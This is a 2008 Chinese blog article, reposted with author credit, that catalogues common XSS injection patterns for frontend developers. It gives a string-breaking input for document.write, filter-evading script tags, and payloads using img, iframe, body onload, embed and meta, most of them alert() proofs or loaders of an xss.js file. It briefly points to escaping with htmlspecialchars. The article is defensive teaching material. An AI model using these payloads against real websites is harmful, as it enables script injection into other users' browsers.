常见的 XSS 注入攻击方式 Part.1
作者:grace 来源:gracecode.com 时间:2008-10-30 13:06:00
前端开发常见的安全问题就是会遭受 XSS 注入攻击,这里列举常见的代码注入方式。
Javascript 代码注入
Javascript 代码注入主要表现为直接引用未经校验的字符串、解析不安全的 JSON 数据(包括 JSONP)等。
很多时候会写这样的代码
document.write('u name is' + name);
这就会形成一定的安全性问题(如果服务器端没有过滤的话),比如 name 为下面的数据,在没有经过过滤时
';alert('xss');//
";alert('xss');//
'';!--"<xss>=&{()}
就会破坏原有代码结构,插入不期望的代码。
HTML 标签注入
HTML 注入是较为常见的一种方式,主要的注入入口为不周全的正则过滤、内联样式(针对 Exploer),下面是常见的注入代码
逃过不周全的正则过滤,解决方案为使用 PHP 的 htmlspecialchars 以及 htmlentities 等类似函数转义。
<sCrIpT src=xss.js></sCrIpT>
<script src=xss.js> </script>
<script/xss src="xss.js"></script>
<script/SRC="xss.js"></script>
<<script>alert("xss");//<</script>
<script>a=/xss/ alert(a.source)</script>
从图片标签中注入,在些论坛上比较常见
<img src="javascript:alert('xss');">
<img """><script>alert("xss")</script>">
<img src="xss.php?param">
从连接标签上注入(虽然本人没有发现过案例,不过也不能轻视)
<script a=">" SRC="xss.js"></script>
<script =">" SRC="xss.js"></script>
<script a=">" '' SRC="xss.js"></script>
其他容易注入的地方
<body onload=alert('xss')>
<iframe src="javascript:alert('xss');"></iframe>
<embed src="xss.swf" AllowScriptAccess="always"></embed>
<meta http-equiv="Set-Cookie" content="USERID=<script>alert('xss')</script>">
先摘记举例那么多,下期的内容包括“CSS 注入”、“其他注入方法”以及一般性解决方案,欢迎探讨和纠正。
标签:xss,注入,前端,javascript
0
投稿
猜你喜欢
做站多年感悟出一个成功站长10个必备要点
2008-12-22 12:39:00
惊云下载系统又暴惊天漏洞
2008-03-09 18:32:00
改进你的WordPress导航菜单-输出标题描述
2011-12-07 11:00:27
parked、sedopro和AdSense for domains三家停放商对比
2009-04-15 16:07:00
iis6修改默认.Net版本
2010-01-13 15:26:00
Linux系统下的动态DNS服务配置方法详解
2010-01-04 19:20:00
如何建立论坛的核心用户 勤奋执着和效率
2009-01-17 14:15:00
用Windows Server 2003搭建安全文件服务器(3)
2007-09-28 13:45:00
齐宁:垃圾链接依然存在 链接也能拉动内需
2009-03-16 09:39:00
社会化媒体整合营销 到底是希望还是忽悠
2009-04-07 12:34:00
泡泡网推出专业社交网络平台我的炮兵团
2009-10-13 17:08:00
专访51wan寻找女一号亚军“09环球皇后中国皇后亚军”叶子金
2009-11-23 09:45:00
SNS网站发展之势:在取舍中凸显自我价值
2008-12-23 10:37:00
SEO中加速新域名收录的6种办法
2007-12-07 18:41:00
站长讲座第九期 UCH官方SNS专家杜均交流地方性SNS运营经验
2009-02-10 18:37:00
凸显使用体验 网站导航最受美国厂商关注
2008-11-28 12:43:00
2008年RSS订阅最多的30个顶尖SEO博客
2009-02-16 10:52:00
动网商业大亨登陆香港 发布会美女云集
2009-10-31 13:06:00
马云:中国未来3-5年电子商务引爆点将是C2B
2009-10-10 17:48:00
如何控制局域网服务器的安全访问
2010-03-29 18:28:00